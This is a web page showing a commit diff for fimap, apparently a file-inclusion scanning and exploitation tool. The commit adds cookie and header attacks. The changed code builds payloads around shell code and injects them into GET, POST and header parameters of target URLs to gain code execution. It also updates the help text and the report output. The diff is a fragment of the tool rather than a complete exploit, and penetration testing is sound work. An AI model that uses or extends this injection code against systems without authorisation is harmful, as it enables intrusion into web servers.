Commit ccc2a061 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Cookie\Header attacking implemented. Needs testing a bit.

parent ae09f929
...@@ -82,7 +82,7 @@ class codeinjector(baseClass): ...@@ -82,7 +82,7 @@ class codeinjector(baseClass):
if (kernel == ""): kernel = None if (kernel == ""): kernel = None
payload = "%s%s%s" %(prefix, shcode, suffix) payload = "%s%s%s" %(prefix, shcode, suffix)
if (ispost == 0): if (ispost == 0):
path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload)) fpath = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 1): elif (ispost == 1):
postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload)) postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 2): elif (ispost == 2):
...@@ -93,7 +93,7 @@ class codeinjector(baseClass): ...@@ -93,7 +93,7 @@ class codeinjector(baseClass):
sys_inject_works = False sys_inject_works = False
working_shell = None working_shell = None
url = "http://%s%s" %(hostname, path) url = "http://%s%s" %(hostname, fpath)
code = None code = None
...@@ -617,17 +617,19 @@ class codeinjector(baseClass): ...@@ -617,17 +617,19 @@ class codeinjector(baseClass):
file = n.getAttribute("file") file = n.getAttribute("file")
param = n.getAttribute("param") param = n.getAttribute("param")
mode = n.getAttribute("mode") mode = n.getAttribute("mode")
ispost = n.getAttribute("ispost")=="1" ispost = int(n.getAttribute("ispost"))
if (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] not in ("ftp", "local")): if (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] not in ("ftp", "local")):
doRemoteWarn = True doRemoteWarn = True
if (mode.find("x") != -1 or (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] in ("ftp", "local"))): if (mode.find("x") != -1 or (mode.find("R") != -1 and settings["dynamic_rfi"]["mode"] in ("ftp", "local"))):
choose[idx] = n choose[idx] = n
if (ispost==1): if (ispost == 0):
textarr.append("[%d] URL: '%s' injecting file: '%s' using POST-param: '%s'" %(idx, path, file, param)) textarr.append("[%d] URL: '%s' injecting file: '%s' using POST-param: '%s'" %(idx, path, file, param))
else: elif (ispost == 1):
textarr.append("[%d] URL: '%s' injecting file: '%s' using GET-param: '%s'" %(idx, path, file, param)) textarr.append("[%d] URL: '%s' injecting file: '%s' using GET-param: '%s'" %(idx, path, file, param))
elif (ispost == 2):
textarr.append("[%d] URL: '%s' injecting file: '%s' using HEADER-param: '%s'" %(idx, path, file, param))
idx = idx +1 idx = idx +1
if (idx == 1): if (idx == 1):
......
...@@ -31,8 +31,6 @@ import language ...@@ -31,8 +31,6 @@ import language
import sys,os import sys,os
import tarfile, tempfile import tarfile, tempfile
import shutil import shutil
# To change this template, choose Tools | Templates
# and open the template in the editor.
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)" __author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$30.08.2009 19:57:21$" __date__ ="$30.08.2009 19:57:21$"
...@@ -93,7 +91,8 @@ def show_help(AndQuit=False): ...@@ -93,7 +91,8 @@ def show_help(AndQuit=False):
print " -P , --post=POSTDATA The POSTDATA you want to send. All variables inside" print " -P , --post=POSTDATA The POSTDATA you want to send. All variables inside"
print " will also be scanned for file inclusion bugs." print " will also be scanned for file inclusion bugs."
print " --cookie=COOKIE Define the cookie which should be send with each request." print " --cookie=COOKIE Define the cookie which should be send with each request."
print " Also the cookie will be scanned for file inclusion bugs." print " Also the cookies will be scanned for file inclusion bugs."
print " Multiple cookies should be concat with ';'."
print " --ttl=SECONDS Define the TTL (in seconds) for requests. Default is 30 seconds." print " --ttl=SECONDS Define the TTL (in seconds) for requests. Default is 30 seconds."
print " --no-auto-detect Use this switch if you don't want to let fimap automaticly detect" print " --no-auto-detect Use this switch if you don't want to let fimap automaticly detect"
print " the target language in blind-mode. In that case you will get some" print " the target language in blind-mode. In that case you will get some"
...@@ -597,7 +596,7 @@ if __name__ == "__main__": ...@@ -597,7 +596,7 @@ if __name__ == "__main__":
sys.exit(1) sys.exit(1)
if (config["p_monkeymode"] == True): if (config["p_monkeymode"] == True):
print "Experimental blind FI-error checking enabled." print "Blind FI-error checking enabled."
......
...@@ -57,23 +57,22 @@ class singleScan(baseClass): ...@@ -57,23 +57,22 @@ class singleScan(baseClass):
header = "[%d] Possible File Inclusion"%(idx) header = "[%d] Possible File Inclusion"%(idx)
if (report.getLanguage() != None): if (report.getLanguage() != None):
header = "[%d] Possible %s-File Inclusion"%(idx, report.getLanguage()) header = "[%d] Possible %s-File Inclusion"%(idx, report.getLanguage())
boxarr.append("::REQUEST::")
boxarr.append(" [URL] %s"%report.getURL()) boxarr.append(" [URL] %s"%report.getURL())
if (report.getPostData() != None and report.getPostData() != ""): boxarr.append(" [POST] %s"%report.getPostData()) if (report.getPostData() != None and report.getPostData() != ""): boxarr.append(" [POST] %s"%report.getPostData())
if (report.isPost == 1): if (report.getHeader() != None and report.getHeader().keys() > 0):
modkeys = ",".join(report.getHeader().keys())
boxarr.append(" [HEAD SENT] %s"%(modkeys))
boxarr.append("::VULN INFO::")
if (report.isPost == 0):
boxarr.append(" [GET PARAM] %s"%report.getVulnKey())
elif (report.isPost == 1):
boxarr.append(" [POSTPARM] %s"%report.getVulnKey()) boxarr.append(" [POSTPARM] %s"%report.getVulnKey())
elif (report.isPost == 2): elif (report.isPost == 2):
boxarr.append(" [VULN HEAD] %s"%report.getVulnHeader()) boxarr.append(" [VULN HEAD] %s"%report.getVulnHeader())
boxarr.append(" [VULN PARA] %s"%report.getVulnKey()) boxarr.append(" [VULN PARA] %s"%report.getVulnKey())
if (report.getHeader() != None and report.getHeader().keys() > 0):
modkeys = ",".join(report.getHeader().keys())
boxarr.append(" [HEAD SENT] %s"%(modkeys))
elif (report.isPost == 0):
boxarr.append(" [PARAM] %s"%report.getVulnKey())
if (report.isBlindDiscovered()): if (report.isBlindDiscovered()):
boxarr.append(" [PATH] Not received (Blindmode)") boxarr.append(" [PATH] Not received (Blindmode)")
else: else:
......
This diff is collapsed.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment